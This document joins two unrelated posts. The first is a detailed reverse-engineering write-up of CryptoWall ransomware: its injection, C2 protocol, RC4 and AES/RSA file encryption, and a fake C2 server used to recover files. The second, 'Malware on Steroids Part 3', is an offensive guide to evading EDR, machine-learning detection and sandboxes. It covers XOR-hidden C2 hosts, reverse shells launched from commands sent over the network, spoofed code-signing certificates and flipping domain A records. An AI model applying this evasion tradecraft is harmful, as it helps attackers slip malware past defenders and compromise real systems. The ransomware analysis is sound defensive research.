Side Note: If you would like to make your life a whole lot easier with resolving the function names in each subroutine, I made a local type definition for IDA Pro over here. The resolving import function table will look a lot cleaner than what you see above:

Image for post

After the function returns, the malware will proceed to generate a unique hash based on your system information, the resulting string will be MD5 hashed => DESKTOP-QR18J6QB0CBF8E8Intel64 Family 6 Model 70 Stepping 1, GenuineIntel. After computing the hash, it will setup a handle to an existing named event object with the specified desired access that will be called as \\BaseNamedObjects\\C6B359277232C8E248AFD89C98E96D65.

The main engine of the code starts a few routines after the malware checks for system information, events, anti-vm, and running processes.

Image for post

Most of the time the ransomware will successfully inject its main thread into svchost and not explorer; so let’s follow that trail. Since this is a 32-bit binary its going to attempt to find svchost.exe inside of SysWOW64 instead of System32. After successfully locating the full path, it will create a new thread using the RtlCreateUserThread() API call. Once the thread is created, NtResumeThread() will be used on the process to start the ransomware_thread code. Debugging these types of threads can be a little convoluted, and setting breakpoints doesn’t always work.

.text:00416F40     ransomware_thread proc near             
.text:00416F40 start+86↓o
.text:00416F40
.text:00416F40 var_14 = dword ptr -14h
.text:00416F40 var_10 = dword ptr -10h
.text:00416F40 var_C = dword ptr -0Ch
.text:00416F40 var_8 = dword ptr -8
.text:00416F40 var_4 = dword ptr -4
.text:00416F40
.text:00416F40 000 push ebp
.text:00416F41 004 mov ebp, esp
.text:00416F43 004 sub esp, 14h
.text:00416F46 018 call ResolveImportsFromDLL
...

Using x32Dbg, you can set the EIP to address 0x00416F40 since this thread is not resource dependent on any of the other code that has been executed up until this point; this thread even utilizes the ResolveImportsFromDLL function we saw in the beginning of the program’s entry point… meaning, the forced instruction pointer jump will not damage the integrity of the ransomware.

isHandleSet = SetSecurityHandle();
if ( isHandleSet && SetupC2String() )
{
v8 = 0;
v6 = 0;
IsSuccess = WhichProcessToInject(&v8, &v6);
if ( IsSuccess )
{
IsSuccess = StartThreadFromProcess(-1, InjectedThread,
0, 0, 0);
FreeVirtualMemory(v8);
}
}

The thread will go through a series of configurations that involve setting up security attributes, MD5 hashing the hostname of the infected system, and then searching to either inject new code into svchost or explorer. In order to start a new thread, the function WhichProcessToInject will query the registry path, and check permissions on what key values the malware has access to. Once chosen, the InjectedThread process will resume. Stepping into that thread, we can see the module size is fairly small.

.text:00412E80     InjectedThread  proc near               ; DATA 
.text:00412E80
.text:00412E80 000 push ebp
.text:00412E81 004 mov ebp, esp
.text:00412E83 004 call MainInjectedThread
.text:00412E88 004 push 0
.text:00412E8A 008 call ReturnFunctionName
.text:00412E8F 008 mov eax, [eax+0A4h]
.text:00412E95 008 call eax
.text:00412E97 004 xor eax, eax
.text:00412E99 004 pop ebp
.text:00412E9A 000 retn
.text:00412E9A InjectedThread endp

At address 0x00412E83, a subroutine gets called that will bring the malware to start the next series of functions that involves the C2 server configuration callback, and the encryption of files. After the thread is finished executing, EAX resolves a function at offset +0x0A4 which will show RtlExitUserThread being invoked. Once we enter MainInjectedThread, you’ll notice the first function at 0x004011B40 is giving us the first clue of how the files will be encrypted.

.text:00411D06 06C                 push    0F0000000h
.text:00411D0B 070 push 1
.text:00411D0D 074 lea edx, [ebp+reg_crypt_path]
.text:00411D10 074 push edx
.text:00411D11 078 push 0
.text:00411D13 07C lea eax, [ebp+var_8]
.text:00411D16 07C push eax
.text:00411D17 080 call ReturnFunctionName
.text:00411D1C 080 mov ecx, [eax+240h]
.text:00411D22 080 call ecx ; CryptAcquireContext

CryptAcquireContext is used to acquire a handle to a particular key container within a particular cryptographic service provider (CSP). In our case, the CSP being used is Microsoft\Enhanced\Cryptographic\Provider\V1, which coincides with algorithms such as DES, HMAC, MD5, and RSA.

Image for post

Once the CryptoContext is populated, the ransomware will use the MD5 hash created to label the victim’s system information and register it as a key path as such → software\\C6B359277232C8E248AFD89C98E96D65. The ransom note is processed by a few steps. The first step is to generate the TOR addresses which end up resolving four addresses: http[:]//torforall[.]comhttp[:]//torman2[.]comhttp[:]//torwoman[.]com, and http[:]//torroadsters[.]com. These DNS records will be used later on to inject into the ransomware HTML file. Next, the note gets produced by the use of the Win32 API function, RtlDecompressBuffer, to decompress the data using COMPRESSION_FORMAT_LZNT1. The compressed ransom note can be found in the .data section and consists of 0x52B8 bytes.

Image for post

Decompressing the note is kind of a mess in python as there is no built in function that is able to do LZNT1 decompression. You can find the actual call at address 0x004087F3.

.text:004087CF 024                 lea     ecx, [ebp+var_8]
.text:004087D2 024 push ecx
.text:004087D3 028 mov edx, [ebp+arg_4]
.text:004087D6 028 push edx
.text:004087D7 02C mov eax, [ebp+arg_6]
.text:004087DA 02C push eax
.text:004087DB 030 mov ecx, [ebp+var_18]
.text:004087DE 030 push ecx
.text:004087DF 034 mov edx, [ebp+var_C]
.text:004087E2 034 push edx
.text:004087E3 038 movzx eax, [ebp+var_12]
.text:004087E7 038 push eax
.text:004087E8 03C call ReturnFunctionName
.text:004087ED 03C mov ecx, [eax+178h]
.text:004087F3 03C call ecx
// Decompiled below
(*(RtlDecompressBuffer))(COMPRESSION_FORMAT_LZNT1,
uncompressed_buffer,
UncompressedBufferSize,
CompressedBuffer,
CompressedBufferSize,
FinalUncompressedSize) )

After the function call, uncompressed_buffer will be a data filled pointer to a caller-allocated buffer (allocated from a paged or non-paged pool) that receives the decompressed data from CompressedBuffer. This parameter is required and cannot be NULL, which is why there is anNtAllocateVirtualMemory() call to this parameter before being passed to decompression. The script I wrote will grab the compressed data from the PE file, and run a LZNT1 decompression algorithm then place the buffer in an HTML file. The resulting note will appear on the victims system as such:

Image for post

Once the note is decompressed, the HTML fields will be populated with multiple TOR addresses at subroutine sub_00414160(). The note is stored in memory then follows a few more checks before the malware sends its first C2 POST request. Stepping into SendRequestToC2 which is located at 0x00416A50, the first thing we notice is a buffer being allocated 60 bytes of memory.

.text:00416A77 018                 push    3Ch
.text:00416A79 01C call AllocateSetMemory
.text:00416A7E 01C add esp, 4
.text:00416A81 018 mov [ebp+campaign_str], eax

All this information will eventually help us write a proper fake C2 server that will allow us to communicate with the ransomware since CryptoWall’s I2P servers are no longer active. Around address 0x004052E0, which we labeled EncryptData_SendToC2 will be responsible for taking our generated campaign string and sending it as an initial ping.

Image for post

If you set a breakpoint at this function, you can see what the parameter contains: {1|crypt1|C6B359277232C8E248AFD89C98E96D65}. Once inside this module, you’ll notice three key functions; one responsible for byte swapping, a key scheduling algorithm, and the other doing the actual encryption. The generated RC4 encryption will end up as a hash string:

85b088216433863bdb490295d5bd997b35998c027ed600c24d05a55cea4cb3deafdf4161e6781d2cd9aa243f5c12a717cf64944bc6ea596269871d29abd7e2

Command & Control Communication

The malware sets itself up for a POST request to its I2P addresses that cycle between proxy1–1–1.i2p & proxy2–2–2.i2p. The way this is done is by using the function at 0x0040B880 to generate a random seed based on epoch time, and use that to create a string that ranges from 11 to 16 bytes. This PRNG (Pseudo-Random Number Generator) string will be used as the POST request’s URI and as the key used in the byte swapping function before the RC4 encryption.

Image for post

To give us an example, if our generated string results in tfuzxqh6wf7mng, then after the function call, that string will turn into 67ffghmnqtuwxz. That string gets used for a 256-generated key scheduling algorithm, and the POST request (I.E., http://proxy1–1–1.i2p/67ffghmnqtuwxz). You can find the reverse engineered algorithm here.

Image for post

The next part will take this byte swapped key, then RC4 encrypt some campaign information that the malware has gathered, which unencrypted, will look like this:

{1|crypt1|C6B359277232C8E248AFD89C98E96D65|0|2|1||55.59.84.254}

This blob consists of the campaign ID, an MD5 hashed unique computer identifier, a CUUID, and the victims public IP address. After preparation of this campaign string, the ransomware will begin to resolve the two I2P addresses. Once CryptoWall sends its first ping to the C2 server, the malware expects back an RC4 encrypted string, which will contain a public key used to encrypt all the files on disk. The malware has the ability to decrypt this string using the same RC4 algorithm from earlier, and will parse the info from this block: {216|1pai7ycr7jxqkilp.onion|[pub_key]|US|[unique_id]}. The onion route is for the ransom note, and is a personalized route that the victim can enter using a TOR browser. The site most likely contains further instructions on how to pay the ransom.

Since the C2 servers are no longer active; in order to actually know what our fake C2 server should send back to the malware; the parser logic had to be carefully dissected which is located at 0x00405203.

Image for post

In this block, the malware decrypts the data it received from the C2 server. Once decrypted, it stores the first byte in ECX and compares hex value to 0x7B (char: ‘{‘). Tracing this function call to the return value, the string returned back will remove brackets from start to end. At memory address 0x00404E69, a DWORD pointer at eax+2ch holds our newly decrypted and somewhat parsed string, that will be checked for a length greater than 0. If the buffer holds weight, we move on over to the final processing of this string routine at 0x00404B00, that I dubbed ParseC2Data(). This function takes four parameters, char* datainint datain_sizechar *dataoutint dataout_size. The first blob on datain data gets parsed from the first 0x7C (char: ‘|’) and extracts the victim id.

victim_id = GetXBytesFromC2Data(decrypted_block_data_from_c2, &hex_7c, &ptr_to_data_out);

ptr_to_data_out and EAX will now hold an ID number of 216 (we got that number since we placed it there in our fake C2). The next block of code will finish the rest of the data:

while ( victim_id )
{
if ( CopyMemoryToAnotherLocation(&some_buffer_to_copy_too,
8 * idx + 8) )
{
CopyBlocksofMemory(victim_id,
&some_buffer_to_copy_too[2 * idx + 1],
&some_buffer_to_copy_too[2 * idx]);
++idx;
if ( ptr_to_data_out )
{
for ( i = 0; *(i + ptr_to_data_out) == 0x7C; ++i )
{
if (
CopyMemoryToAnotherLocation(&some_buffer_to_copy_too,
8 * idx + 8) )
{
++v9;
++idx;
}
}
}
}
victim_id = GetXBytesFromC2Data(0, &hex_7c_0,
&ptr_to_data_out);
++v5;
++v9;
}

What’s happening here is that by every iteration of the character ‘|’ we grab the next chunk of data and place it in memory into some type structure. The data jumps X amount of times per loop until it reaches the last 0x7C byte. It will loop a total of four times. After this function returns, dataout will contain a pointer in memory to this local type, which we reversed to look like this:

struct _C2ResponseData
{
int victim_id;
char *onion_route;
const char* szPemPubKey;
char country_code[2];
char unique_id[4];
};

Shortly after, there is a check to make sure the victim id generated is no greater than 0x3E8 or that it is not an unsigned value.

value_of_index = CheckID(*(*parsed_data_out->victim_id));
if ( value_of_index > 0x3E8 || value_of_index == 0xFFFFFFFF )
value_of_index = 0x78;

I believe certain malware will often perform these checks throughout the parsing of the C2 response server to make sure the data being fed back is authentic. Over at 0x00404F35, there is another check to see how many times it tried to reach the command server. If the check reaches exactly 3 times then it will move to check if the onion route is valid; all CryptoWall variants hardcode the first string index with ascii ‘1’. If it does not start with this number, then it will try to reach back again for a different payload. The other anti-tamper check it makes for the onion route is a CRC32 hash against the payload, if the compressed route does not equal 0x63680E35, the malware will try one last time to compare against the DWORD value of 0x30BBB749. The variant has two hardcoded 256 byte arrays to which it compares the encrypted values against. Brute-forcing can take a long time but is possible with a python script that I made here. The checksum is quite simple, it will take each letter of the site string and logical-XOR against an unsigned value:

tmp = ord(site[i])) ^ (ret_value & 0xffffff)

It will take the tmp value and use it as an index in the hardcoded byte array to perform another logical-XOR against :

ret_value = bytes_array[tmp*4:(tmp*4)+4] ^ (0xFFFFFFFF >> 8)

The return value then gets inverted giving us a 4 byte hash to verify against. Now the malware moves on over to the main thread responsible for encrypting the victims files at 0x00412988. The first function call in this thread is from CryptAcquireContextW, and that will acquire a handle to a particular key container within a CSP. 16 bytes will then be allocated to the stack using VirtualAlloc; which will be the buffer to the original key.

isDecompressed = CreateTextForRansomwareNote(0, 0, 0);
if ( !isRequestSuccess || !isDecompressed )
{
remaining_c2_data = 0;
while ( 1 )
{
isRequestSuccess = SecondRequestToC2(&rsa_key,
&rsa_key_size, &remaining_c2_data);
if ( isRequestSuccess )
break;
sleep(0x1388u);
}

Once the text for the ransom note is decompressed, CryptoWall will place this note as an HTML, PNG, and TXT file inside of every directory the virus went through to encrypt documents. After this point, it will go through another round of requests to the I2P C2 servers to request another RSA 2048-bit public key. This key will be the one used for encryption. This strain will do a number of particular hardcoded hash checks on the data it gets back from the C2.

Decoding the Key

CryptoWall will use basic Win32 Crypto functions like CryptStringToBinaryACryptDecodeObjectEx, & CryptImportPublicKeyInfo to decode the RSA key returned. Then it will import the public key information into the provider which then returns a handle of the public key. After importing is finished, all stored data will go into a local type structure like this:

struct _KeyData
{
char *key;
int key_size;
BYTE *hash_data_1;
BYTE *hash_data_2;
};// Gets used here at 0x00412B8C
if ( ImportKey_And_EncryptKey(
cryptContext,
rsa_key,
rsa_key_size,
OriginalKey->key,
&OriginalKey->key_size,
&OriginalKey->hash_data_1,
&OriginalKey->hash_data_2) )
{

The next actions the malware takes is pretty basic for ransomware.. it will loop through every available drive, and use GetDriveTypeW to determine whether a disk drive is a removable, fixed, CD-ROM, RAM disk, or network drive. In our case, the C drive is the only open drive which falls under the category of DRIVE_FIXED. CryptoWall will only check if the drive is CD-ROM because it will not try to spread in that case.

.text:00412C1B      mov     ecx, [ebp+driver_letter]
.text:00412C1E push ecx
.text:00412C1F call GetDriveTypeW
.text:00412C2C cmp eax, 5
.text:00412C2F jz skip_drive

EAX holds the integer value returned from the function call which represents the type of drive associated with that number (5 == DRIVE_CDROM). You can find the documentation here.

The exciting part is near as we are about to head over to where the malware duplicates the key it retrieved from our fake C2 server at address 0x00412C7A. What is happening here is pretty straight forward, and we can show in pseudo-code:

if (OriginalKey)
DuplicatedKey = HeapAlloc(16)
if (DuplicatedKey)
CryptDuplicateKey(OriginalKey, 0, 0, DuplicatedKey)
memcpy(DuplicatedKey, OriginalKey, OrignalKey_size)
CryptDestroyKey(OriginalKey)

Essentially CryptDuplicateKey is making an exact copy of a key and the state of the key. The DuplicatedKey variable ends up becoming a struct as we can see after the function call at 0x00412C7A, it gets used to store volume information about the drive its currently infecting.

GetVolumeInformation(driver_letter, DuplicatedKey + 20);
if ( MoveDriverLetterToDupKeyStruct(driver_letter,
(DuplicatedKey + 16), 0) {
...

That is why 24 bytes was used to allocate to the heap when creating this variable instead of 16. Now we can define our struct from what we know so far:

struct _DupKey
{
const char *key;
int key_size;
DWORD unknown1;
DWORD unknown2;
char *drive_letter;
LPDWORD lpVolumeSerialNumber;
DWORD unknown3;
};// Now our code looks cleaner from above
GetVolumeInformation(driver_letter,
&DuplicatedKey->lpVolumeSerialNumber);
if ( MoveDriverLetterToDupKeyStruct(driver_letter,
&DuplicatedKey->drive_letter, 0) {
...

Encrypting of Files

After the malware is finished storing all pertinent information regarding how and where it will do its encryption, CryptoWall moves forward to the main encryption loop at 0x00416780.

Image for post
Encryption Loop Control Flow Graph

As we can see, the control flow graph is fairly long in this subroutine, but nothing out of the ordinary when it comes to ransomware. A lot has to be done before encrypting files. At the start of this function, we see an immediate call to HeapAlloc to allocate 260 bytes of memory. We can automatically assume this will be used to store the file’s absolute path, as Windows OS only allows a max of 260 bytes. Upon success, there is also an allocation of virtual memory with a size of 592 bytes that will later be used as the file buffer contents. Then the API call FindFirstFileW uses this newly allocated buffer to store the first filename found on system. The pseudo-code below will explain the flow:

lpFileName = Allocate260BlockOfMemory(); // HeapAlloc
if ( lpFileName )
{
(*(wcscpy + 292))(lpFileName, driver_letter);
...
lpFindFileData = AllocateSetMemory(592); // VirtualAlloc
if ( lpFindFileData )
{
hFile = (*(FindFirstFileW + 504))(lpFileName, lpFindFileData);
if ( hFile != 0xFFFFFFFF )
{
v29 = 0;
do
{
// Continue down to further file actions

Before the malware opens up the first victim file, it needs to make sure the file and file extension themselves are not part of their hardcoded blacklist of bytes. It does this check using a simple CRC-32 hash check. It will take the filename, and extension; compress it down to a DWORD, then compare that DWORD to a list of bytes that live in the .data section.

Image for post

To see how the algorithm works, I reversed it to python code, and wrote my own file checker.

➜  python tor_site_checksum_finder.py --check-file-ext "dll"
[!] Searching PE sections for compressed .data
[!] Searching PE sections for compressed extension .data

[-] '.dll' is not a valid file extension for Cryptowall

➜ python tor_site_checksum_finder.py --check-file-ext "py"
[!] Searching PE sections for compressed .data
[!] Searching PE sections for compressed extension .data

[+] '.py' is a valid file extension for Cryptowall

Now we can easily tell what type of files CryptoWall will attack. Obvious extensions like .dll.exe, and .sys is a very common file type for ransomware to avoid.

Image for post

If the file passes these two checks, then it moves on over to the last part of the equation; the actual encryption located at 0x00412260. We can skip the first few function calls as they are not pertinent to what is about to happen. If you take a look at address 0x00412358, there is a subroutine that takes in three parameters; a file handle, our DuplicateKeyStruct, and a file size. Stepping into the function, we can immediately tell what is happening:

if(ReadFileA(hFile, lpBuffer, 
DuplicateKeyStruct->file_hash_size,
&lpNumberOfBytesRead, 0) && lpNumberOfBytesRead) ==
DuplicateKeyStruct->file_hash_size
{
if(memcmp(lpBuffer, DuplicateKeyStruct->file_hash,
DuplicateKeyStruct->file_hash_size))
{
isCompare = 1;
}
}

The pseudo-code is telling us that if an MD5 hash of the file is present in the header, then its already been encrypted. If this function returns isCompared to be true, then CryptoWall moves on to another file and will leave this one alone. If it returns false from the Compare16ByteHeader() function call, the malware will append to the file’s extension by using a simple algorithm to generate a three lettered string to place at the end. The generation takes a timestamp, uses it as a seed, and takes that seed to then mod the first three bytes by 26 then added to 97.

*(v8 + 2 * i) = DataSizeBasedOnSeed(0, 0x3E8u) % 26 + 97;

This is essentially a rotation cipher, where you have a numerical variable checked by a modulate to ensure it doesn’t go past alphanumeric values, then the addition to 97 rotates the ordinal 45 times. As an example, if we have the letter ‘A’, then after this cipher, it ends up becoming an ’n’. In conclusion, if the victim file is named hello.py, this subroutine will rename it to hello.py.3xy.

Next, around address 0x004123F0, the generation of an AES-256 key begins with another call to Win32’s CryptAcquireContextW. The phProv handler gets passed over to be used in CryptGenKey and CryptGetKeyParam.

if ( CryptGenKey(hProv, 0x6610, 1, &hKey) ):
pbData_1 = 0;
pdwDataLen_1 = 4;
if ( CryptGetKeyParam(hKey, 8, &pbData_1, &pdwDataLen_1, 0, 4)

The hexadecimal value of 0x6610 shown above tells us that the generated key is going to be AES-256 as seen in MS-DOCS. Once the hKey address to which the function copies the handle of the newly generated key is populated, CryptGetKeyParam will be used to make the key and transfer it into pbData; a pointer to a buffer that receives the data. One last call in this function we labeled as GenerateAESKey() gets called which is CryptExportKey. This will take the handle to the key to be exported and pass it the function, and the function returns a key BLOB. The second parameter of the GenerateAESKey() will hold the aes_key.

Image for post

The next call is one of the most important ones to understand how eventually we can decrypt the files that CryptoWall infected. EncryptAESKey() uses the pointer to DuplicateKeyStruct->rsa_key to encrypt our AES key into a 256 byte blob. Exploring inside this function call is fairly simple; it uses CryptDuplicateKey and CryptEncrypt to take our public RSA 2048-bit key from earlier, our newly generated AES key to duplicate both keys to save for later, and encrypt the buffer. The fifth parameter is our data out in this case and once the function returns, what we labeled as encrypted_AESkey_buffer will hold our RSA encrypted key.

At around address 004124A5, you will see two calls to WriteFileA. The first call will move the 16 byte MD5 hash at the top of the victim file, and the second call will write out the 256 bytes of encrypted key buffer right below the hash.

Image for post
Screenshot shows 128 byte encrypted key buffer, but it was a copy mistake; Supposed to be 256 bytes of encrypted key text.

The picture above shows what an example file will look like up until this stage of the infection. The plaintext is still intact, but the headers now hold the hash of the file and the encrypted AES key used to encrypt the plaintext in the next phase. ReadFileA will shortly get called at 0x0041261B, which will read out everything after the header of the file to start the encryption process.

Image for post

Now that 272 bytes belong to the header, anything after that we can assume is free range for the next function to deal with. We don’t really need to deep dive too much into what DuplicateAESKey_And_Encrypt() does as it is pretty self explanatory. The file contents are encrypted using the already generated AES key from above that was passed into the HCRYPTKEY *hKey variable. The sixth parameter of this function is the pointer which will contain the encrypted buffer. At this point the ransomware will replace the plaintext with an encrypted blob, and the AES key is free’d from memory.

Image for post
Example of a fully encrypted file

After the file is finished being processed, the loop will continue until every allow listed file type on disk is encrypted.

Decrypting Victim Files

Unfortunately in this case, it is only possible to write a decryption algorithm if you know the private key used which is generated on the C2 side. This is going to be a two step process as in order to decrypt the file contents, we need to decrypt the AES key that has been RSA encrypted.

The fake C2 server I wrote also includes an area where a private key is generated at the same time that the public key is generated. So in my case, all encrypted files on my VM are able to be decrypted.

Side Note: In order to run this C2 server, you have to place the malware’s hardcoded I2P addresses in /etc/hosts on Windows. Then make sure the server has started before executing the malware as there will be a lot of initial verification going back and forth between the malware and ‘C2’ to ensure its legitimacy. Your file should look like this:

127.0.0.1 proxy1-1-1.i2p
127.0.0.1 proxy2-2-2.i2p

Another reason why we un the fake C2 server before executing the malware is so we don’t end up in some dead lock state. The output from our server will look something like this:

C:\CryptoWall\> python.exe fake_c2_i2p_server.py

* Serving Flask app "fake_c2_server" (lazy loading)
127.0.0.1 - - [31/Mar/2020 15:10:06] "�[33mGET / HTTP/1.1�[0m" 404 -

Data Received from CryptoWall Binary:
------------------------------
[!] Found URI Header: 93n14chwb3qpm
[+] Created key from URI: 13349bchmnpqw
[!] Found ciphertext: ff977e974ca21f20a160ebb12bd99bd616d3690c3f4358e2b8168f54929728a189c8797bfa12cfa031ee9c2fe02e31f0762178b3b640837e34d18407ecbc33
[+] Recovered plaintext: b'{1|crypt1|C6B359277232C8E248AFD89C98E96D65|0|2|1||55.59.84.254}'

[+] Sending encrypted data blob back to cryptowall process
127.0.0.1 - - [31/Mar/2020 15:11:52] "�[37mPOST /93n14chwb3qpm HTTP/1.1�[0m" 200

Step by step, the first thing we have to do is write a program that imports the private key file. I used C++ for this portion because for the life of me I could not figure out how to mimic the CryptDecodeObjectEx API call that decodes the key in a X509_ASN_ENCODING and PKCS_7_ASN_ENCODING format. Once you have the key blob from this function, we can use this function as the malware does and call CryptImportKey, but this time it is a private key and not a public key ;). Since the first 16 bytes of the victim file contains the MD5 hash of the unencrypted file, we know we can skip that part and focus on the 256 bytes after that part of the header. The block size is going be 256 bytes and AES offset will be 272, since that will be the last byte needed in the cryptographic equation. Once we get the blob, it is now okay to call CryptDecrypt and print out the 32 byte key blob:

if (!CryptDecrypt(hKey, NULL, FALSE, 0, keyBuffer, &bytesRead))  
{
printf("[-] CryptDecrypt failed with error 0x%.8X\n",
GetLastError());
return FALSE;
} printf("[+] Decrypted AES Key => ");
for(int i = 0; i < bytesRead; i++)
{
printf("%02x", keyBuffer[i]);
}

You can find the whole script here. Now that we are half way there and we have an AES key, the last thing to do is write a simple python script that will take that key / encrypted file and decrypt all remaining contents of it after the 272nd byte.

enc_data_remainder = file_data[272:]
cipher = AES.new(aes_key, AES.MODE_ECB)
plaintext = cipher.decrypt(enc_data_remainder)

The script to perform this action is in the same folder on Github. If you want to see how the whole thing looks from start to finish, it will go like this:

➜  decrypt_aes_key.exe priv_key_1.pem loveme.txt
[+] Initialized crypto provider
[+] Successfully imported private key from PEM file
[!] Extracted encrypted AES keys from file
[+] Decrypted AES Key => 08020000106600002000000040b4247954af27637ce4f7fabfe1ccfc6cd55fc724caa840f82848ea4800b320
[+] Successfully decrypted key from file

➜ python decrypt_file.py loveme.txt 40b4247954af27637ce4f7fabfe1ccfc6cd55fc724caa840f82848ea4800b320
[+] Decrypting file
[+] Found hash header => e91049c35401f2b4a1a131bd992df7a6
[+] Plaintext from file: b'"hello world" \r\n\'

Conclusion

Overall this was one of the biggest leading cyber threats back in 2013, and the threat actors behind this malicious virus have shown their years of experience when it comes to engineering a ransomware such as this.

Although this ransomware is over 6 years old, it still fascinated me so much to reverse engineer this virus that I wanted to share all the tooling I have wrote for it. Every step of the way their was another challenge to overcome, whether it was knowing what the malware expected the encrypted payload to look like coming back from the C2, figuring out how to decrypt their C2 I2P servers using RC4, decompressing the ransomware note using some hard to mimic LZNT1 algorithm, or even understanding their obscure way of generating domain URI paths… it was all around a gigantic puzzle for a completionist engineer like myself.

Here is the repository that contains all the programs I wrote that helped me research CryptoWall.

Thank you for following along! I hope you enjoyed it as much as I did. If you have any questions on this article or where to find the challenge, please DM me at my Instagram: @hackersclub or Twitter: @ringoware

Happy Hunting 🙂

Malware on Steroids Part 3: Machine Learning & Sandbox Evasion

 

( Original text by Paranoid Ninja )

It’s been a busy month for me and I was not able to save time to write the final part of the series on Malware Development. But I am receiving too many DMs on Twitter accounts lately to publish the final part. So here we are.

If you are reading this blog, I am basically assuming that you know C/C++ and Windows API by now. If you don’t, then you should go back and read my other blogs on Static AV Evasion and Malware Development using WINAPI (basics).

In this post, we will be using multiple ways to evade endpoint detection mechanisms and sandboxes. Machine Learning is applied at two major levels in most organization. One is at the network level where it tries to identify anomalies based on the behavior of network connections, proxy logs and pattern of connections over time. Most Network ML Solutions tend to analyze beacons of malwares and DPI (deep packet inspection) to identify the malware. This is something that Microsoft ATA (Advanced Threat Analytics), or FireEye sandboxes do. On the other hand, we have Endpoint agents like Symantec EP, Crowdstrike, Endgame, Microsoft Cloud Defender and similar monitoring tools which perform behavioral analysis of the code along with signature detection to detect malicious processes.

I will purely be focusing on multiple ways where we can make our malware behave like a legitimate executable or try to confuse the Endpoint agent to evade detection. I’ve used the methods mentioned in this blog to successfully evade Crowdstrike Agent, Symantec EP and Microsoft Windows Cloud Defender, the videos of the latter which I have already posted in my previous blogs. However, you might need to modify or add new techniques as this might become detectable over time. One of the best ways to avoid AV is to disable the Process creation altogether and just use WINAPI. But that would mean carefully crafting your payloads and it would be difficult to port them for shellcoding. That’s the main reason malware authors write their malwares in C, and only selected payloads in shellcode. A combination of these two makes malwares unbeatable on all fronts.

Each of the techniques mentioned below creates a unique signature which most AVs won’t have. It’s more of a trail and error to check which AVs detect which techniques. Also remember that we can use stubs and packers for encryption, but that’s for a different blog post that I will do later.

P.S.: This blog is exclusive of shellcodes, reason being I will be writing a separate blog series on windows Shellcoding later. I will be using encrypted functions during the shellcoding part and not in this post. This post is specifically how Malware authors use C to perform evasions. You can also use the same APIs and code snippets mentioned below to craft a custom malware for Red Teaming.

main():

So, before we start let’s try to get a based understanding of how Machine learning works. Machine learning is purely focused on the behaviour of the user (in case of endpoints). In short, if we sign our malware and try to make it act like a legitimate executable, it becomes really easy to evade ML. I’ve seen people using PowerShell to write reverse shells, but they get easy detectable due to Microsoft’s AMSI (Anti-Malware Scan Interface) which consistently keeps on checking (including and mainly PowerShell) to detect malicious process executions and connections.  For those of you who don’t know, Microsoft uses DMTK(Microsoft Distributed Machine Learning Toolkit) framework which is basically a decision tree based algorithm which specifies whether a file is malicious or not. PowerShell is very tightly controlled by Microsoft and it gets harder over time to evade ML when using PowerShell.

This is the reason I decided to switch to C and C++ to get reverse shells over network so that I could have flexibility at a lower level to do whatever I want. We will be using a lot of windows APIs, encrypted variables and a lot of decision tree of our own to evade ML. This it supposed to work till Microsoft doesn’t start using CNTK framework which is a much better framework than DMTK, but harder to apply at the same time.

Encrypted Host & Process Names

So, the first thing to do is to encrypt our hostname. We can possibly use something as simple as XOR, or any custom complicated mathematical equation to decrypt our encrypted variable to get the hostname. I created a python script which takes a hostname and a character and returns a Xor’d Array:

As you can see, it gives the Key value in integer of the Xor Key, the length of the encrypted array and the whole Encrypted array which we can simply use in a C integer or char array.

The next step is to decrypt this array at runtime and we need to hardcode the key inside the executable. This is the only key that we would be hardcoding into the code. Also, to make it complicated for the reverse engineer, we will write a C function to automatically detect that the last integer is the key and use that to loop through the array to decrypt the encrypted string. Below is how it would look like

So, we are creating a char buffer of the size of EncryptedHost on heap. We are then passing the host, length and decrypted host variable to the Decrypter function. Below is how the Decrypter function looks:

To explain in short, it creates an Encrypted Integer array of our char array  and xors them back again using the key to convert the encrypted value to the original value and stores them in the DecryptedData array we created previously. With the help of this, if someone runs strings, they wouldn’t be able to see any host in the executable. They would need to understand the math and set a proper breakpoint in Debugger to fetch the C2 host. You can create more complicated mathematical equations to decrypt host if required. We can now use this DecryptedData array within our sockets to connect to the remote host.

P.S.: Reverse Engineers & Sandboxes can fetch the C2 names with the help of packet captures and DNS Name Resolutions. It is better to send raw packets to multiple hosts to confuse which one is the real C2 server. But at the same time, this can lead to easy  detection of the malware. Check my Legitimate Domain Routing technique below which is much better than using this.

If you’ve read my previous post, then you know that I created a cmd.exe process using the CreateProcessW winAPI. We can do what we did above for Creating Processes as well. But instead of hardcoding the Encrypted array for the Process to be executed, we will send the process name as an array over network once the executable connects to the C2 Server along with the host. We can also use authentication on C2 server, and only allow it to connect if it sends a proper key. Below is the Code for Creating Processes using Encrypted Char array over sockets

In this way, when a system sandboxes our executable, it won’t know that what process are we executing beforehand inside a sandbox. Below is a much clearer description of what we are doing:

  1. Decrypt C2 host at runtime and connect to host
  2. Receive password and verify if it is right
  3. If the key is right, wait for 5 seconds to receive encrypted array(process name) over socket
  4. Decrypt the received Process and run it using CreateProcessW API

With the help of the above technique, if our C2 is down, then the sandbox/analyst will not be able to find what we are executing since we have not hardcoded any processes to execute.

Code Signing with Spoofed Certs

I wrote a Script in python which can fetch and create duplicate certificates from any website which we can use for code signing. One thing I noticed is that Antiviruses don’t check and verify the whole chain of the certificate. They don’t even verify the authenticity. The main reason being not every antivirus can connect to internet in every organization to fetch and verify the ceritificates for every third party application installed. You can find the Certificate spoofing python script on my GitHub profile here.

And this is the scan results of Windows ML Defender after Signing:

Next thing is we will try to add a few features to our malware to detect if we are running in a sandbox or inside a virtual machine. We will try to evade Sandboxes as much as possible and kill our executable as soon as we find anything suspicious. We need to make sure that our malware doesn’t even look suspicious. Because if it does, then the sandbox will quarantine it and send an alert that there is a suspicious process running. This is worse than detection because this is where most SOC detects the malware and the Red Teaming gets detected.

Legitimate Domain Routing (Evade Proxy Categorization Detection and Endpoint Detection)

This is one of the best techniques I’ve found out till date which almost works every time. Let’s say I buy a C2 domain named abc.com. I will modify the A records so that it points to Microsoft.com or some similar legitimate site for a month or so. When the malware executes on the vicim’s system, it will connect to this domain which will send a normal HTTP reply from Microsoft and the malware will go to sleep for a few hours and then loop into doing the same thing. Now whenever I want to get a reverse shell of my malware, I will simply change the A records of abc.com to my C2 hosting server and it will send a key in HTTP to the malware which will trigger it to fetch shellcode or send a shell back to my C2. This way, our abc.com will also get categorized as a legitimate domain instead of malicious or phishing site. And even the Endpoint systems will not block it since it is contacting a legitimate domain. Over time I’ve also used Symantec’s website to connect as a temporary domain, later changing it to my malicious C2 server.

Check System Uptime & Idletime (Evades Virtual Machine Sandboxes)

